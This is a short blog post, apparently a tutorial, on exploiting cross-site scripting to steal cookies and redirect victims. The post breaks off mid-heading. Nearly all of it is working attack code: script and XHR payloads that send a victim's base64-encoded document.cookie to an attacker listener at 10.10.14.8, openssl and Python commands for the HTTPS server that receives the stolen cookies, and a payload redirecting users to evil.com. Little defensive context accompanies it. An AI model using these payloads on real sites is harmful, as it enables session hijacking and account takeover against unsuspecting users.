Exploiting XSS-stealing cookies, csrf

n00🔑
4 min readMar 31, 2022

Cookie Stealing-

(Note: HttpOnly should not be enabled/present in cookie header)

  1. Classic way-
<script>var i=new Image(); i.src="http://10.10.14.8/?cookie="+btoa(document.cookie);</script>

Here we have used btoa() method for converting the cookie string into base64 encoded string.

python3 -m http.server -m 80

2. Bypassing secure flag protection-

a) Creating a HTTPS server-

openssl req -new -x509 -keyout localhost.pem -out localhost.pem -days 365 -nodes

Generating certificate.

#!/usr/bin/python3
import http.server, ssl
server_address = ('0.0.0.0', 443)
httpd = http.server.HTTPServer(server_address, http.server.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,server_side=True,certfile='localhost.pem')
"""ssl_version=ssl.PROTOCOL_TLSv1_2)
"""
httpd.serve_forever()

Starting web server.

2. Via XHR-

var xhr=new XMLHttpRequest(); 
xhr.open("GET", "https://10.10.14.8/?"+document.cookie, true);
xhr.send();

3. Fetch api

Redirecting User to malicious websites-

<script>window.location.replace("http://evil.com");</script>

Accessing internal…

--

--